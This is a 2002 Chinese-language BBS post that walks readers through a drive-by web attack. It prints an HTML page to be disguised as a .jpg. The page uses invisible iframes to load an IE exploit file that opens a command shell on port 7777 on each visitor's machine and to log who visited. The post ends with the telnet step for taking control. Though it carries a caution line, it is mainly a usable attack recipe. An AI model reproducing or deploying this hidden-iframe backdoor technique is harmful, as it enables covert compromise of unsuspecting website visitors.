荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: sephiroth (birds of paradise), 信区: Internet
标 题: 网站原代码攻击!--慎用
发信站: 荔园晨风BBS站 (Sun May 19 19:03:53 2002), 转信
下面是--编辑的一个示例的网站页面,我以前就遭到过这样的网站原代码的攻击
导致所有的EXE程序被锁死,注册表也被砍了!
下面的当然不是这样的 攻击网站原代码。
下面我简单介绍:
你可以申请一个空间,然后把下面的原代码保存成JPG格式,
作为主页,上传到你的空间。他会自动更改为HTML格式
如果,有人浏览了这个页面,会自动后台通过IE的点点漏洞,访问load.eml 时将
被自动的起出端口 7777的cmd sh*ll
打开他的主机的 7777 段口
当然,你会问,怎么知道谁来过这个网站呢?又怎样控制呢?
这里面我们可以看到+<iframe src="fangwen.htm" width="0"
height="0" frameborder="no" border="0" marginwidth="0"
marginheight="0" scrolling="no"> +这句话,意思就是统计谁来过
ok , 现在你在命令行输入 telnet 目标ip 7777 就可以知道结果了!
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
网页原码:
===============http://www.chinawolf.com/~vertarmy/1.
jpg====================
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>New Page 1</title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>
<body>
<p><img src="ot2131.JPG" width="322"
height="486"></p>
<iframe src="load.eml" width="0" height="0"
frameborder="no" border="0" marginwidth="0" marginheight="0"
scrolling="no">
</iframe>
<iframe src="fangwen.htm" width="0"
height="0" frameborder="no" border="0" marginwidth="0"
marginheight="0" scrolling="no">
</iframe>
</body>
</html>
===================================================================
*******警告请不要轻易查看该页面!
%%%%%%%%%%%%%
原代码说明:
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
上面这个页面首先利用了IE的APP漏洞,它对含有 HTML 语句的文本不检查扩展名。
在 NOTEPAD 上写一份 HTML 文件,保存为 .jpg。上传至空间服务器,用 IE 访问
URL。发现,IE 把 .jpg 误读成 .html.
接下来我们用了两个 iframe 分别调用页面,
load.eml
fangwen.htm
显示大小为 width="0" height="0" 所以在页面中不显示,
load.eml 是利用了ie的通过构造特殊代码导致
IE 用户执行攻击者命令漏洞
--
希望自己多一点阳光, 少一点颓废...
set me free...
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.44.250]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店